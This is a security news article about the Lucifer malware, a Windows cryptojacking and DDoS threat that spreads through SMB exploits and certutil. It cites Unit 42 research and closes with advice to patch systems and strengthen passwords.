Evil Lucifer Malware targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks
A downright devilish self-propagating new malware known as Lucifer is targeting Windows systems with cryptojacking and DDoS capabilities.
Lucifer, which has recently been identified, initially tries to infect PCs by bombarding them with a multitude of exploits in an effort to capitalize on unpatched vulnerabilities. While there are patches for all the critical and high-severity known bugs, the companies that have been targeted by Lucifer malware have not applied the fixes.
According to Researchers with Palo Alto Networks’ Unit 42 Team, “Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,”
After successfully exploiting these vulnerabilities, Lucifer then connects the hackers to the command-and-control server and executes arbitrary commands on the vulnerable device. These commands include performing a UDP, TCP or HTTP Denial of Service or DoS attack. Other commands allow Lucifer to drop an XMRig miner and launch crypto-jacking attacks, as well as collecting interface info.
Lucifer: A Self Propagating Threat
In addition to making brute force attempts to crack victims’ credentials, Lucifer leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol is open, Lucifer can execute several backdoors. These backdoors include the Eternal Romance, EternalBlue and DoublePulsar exploits.
After these three exploits have been used, the certutil utility is then leveraged to propagate Lucifer. Certutil.exe is a command-line program which is installed as part of Certificate Services that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore Certification Authority components, and verify certificates.
Lucifer Rears His Evil Head
Lucifer malware has been discovered in a series of recent attacks that are thought to be still ongoing. The first set of attacks occurred on June 10th of 2020. The attackers resumed the campaign the next day with an upgraded version of the malware. Researchers say these upgrades included the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.
This added functionality shows that Lucifer is growing in sophistication, according to researchers. Experts say companies can protect themselves with simple security measures such as checking for updates, applying patches and strengthening passwords.